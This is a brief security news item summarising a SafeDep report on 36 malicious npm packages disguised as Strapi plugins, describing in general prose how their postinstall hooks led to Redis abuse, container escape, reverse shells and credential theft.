Extensive compromise facilitated by dozens of illicit npm packages

Thirty-six malicious npm packages masquerading as Strapi CMS plugins have been spreading multiple payloads enabling Redis and PostgreSQL abuse, reverse shell injections, credential harvesting, and persistent implant deployment, according to The Hacker News.

Intrusions involving the packages — which contained a postinstall script hook that concealed nefarious code and allowed execution without user interaction — commenced with the exploitation of a local Redis instance for remote code execution, disk-stored secret scanning, and Guardarian API module exfiltration, a report from SafeDep revealed.

After using Docker container escape for shell payload writing, attacks proceed with reverse shell delivery, shell downloader writing, and environment variable and PostgreSQL database connection string scanning before the launch of a credential harvester and reconnaissance payload. Hardcoded credentials and secrets obtained from Strapi-specific table queries then ensure a connection with the target's PostgreSQL database for later abuse and the eventual injection of a persistent implant, credential theft, and persistent reverse shell compromise.

Such findings come amid escalating supply chain intrusions, with a Group-IB report noting npm, PyPI, and other package repositories as leading targets of such attacks.